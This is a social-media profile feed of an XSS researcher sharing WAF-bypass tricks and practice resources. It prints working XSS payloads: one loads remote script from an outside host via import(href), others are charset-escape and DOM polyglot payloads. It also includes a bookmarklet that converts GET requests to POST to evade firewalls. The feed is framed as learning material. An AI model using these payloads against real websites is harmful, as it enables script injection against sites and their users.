
Brute Logic
@BRuteLogic
#CyberSecurity | #XSS #SQLi #SSRF | #WAF #bypass | #hack2learn | @RodoAssis | @KN0X55 | https://t.co/SIanVGfIHN | https://t.co/GyZaXU7FX9
Brazil 🇧🇷
Joined October 2009
One #XSS Payload to Rule Them All. #Bypass Akamai, Imperva and CloudFlare #WAF. <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>. #hack2learn @KN0X55
RT @KN0X55: 🏆 KNOXSS September 2025 Giveaway 🏆. ➡️ Follow, like and share! 😍. ➡️ 1 Month Pro access for 3 winners on Friday 5th. Good luck!….
RT @KN0X55: #XSS tricks to #Bypass #WAF in the URL Context. By @BRuteLogic. => HTMLi + Double Encoding + Embedded Bytes. JavaScript:"<Svg/On….
Super Simple Script GET 2 POST. WAFs usually got bypassed easier via POST so if you can change from GET to POST you increase your chances. Copy and save the code below as your bookmark. #bookmarklet
JavaScript:l=location,p=new URLSearchParams(l.search);i='';p.forEach((v,n)=>{i+='<Input Name="'+n+'" Value="'+v+'"><br><br>'});document.write(('Data:Text/Html,<Form Action="'+l.origin+l.pathname+'" Method=Post>'+i+'<Input Type=Submit></Form>').replace(/</g,'&lt;'))
RT @Le_Unsung_Hero: I had a URL which I know it's 100% vulnerable to XSS but the WAF is always in its way to block my payloads. Tried @KN0….
RT @KN0X55: 🏆 KNOXSS August 2025 Giveaway 🏆. ➡️ Follow, like and share! 😍. ➡️ 1 Month Pro access for 3 winners on Friday 8th. Good luck! 🤞….
RT @BRuteLogic: Help us tailor the content we share here. Is it easy for you to exploit a clear XSS vulnerability? (like the ones here =>….
JSi - Escape the Escape. Chinese and Japanese Charsets. GBK, GBK2312, GBK19030. %81'/alert(1)//. ISO-2022-JP. %1B%28%4A'/alert(1)//. For when a filter does that: '-alert(1)-' ➡️ \'-alert(1)-\'. \'-alert(1)// ➡️ \\\'-alert(1)//. #XSS #bypass #hack2learn
web.archive.org
So here are the 7 cases everyone should know to be able to PoC the vast majority of XSS flaws out there. A web page to show them
Practice your #XSS muscles.
x55.is
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
A DOM-Based #XSS Polyglot. 1;/*'"><Img/Src/OnError=/**/confirm(1)//>. If your input happens to end up in the DOM via innerHTML or eval(), it works for both cases. PoCs below. innerHTML: eval():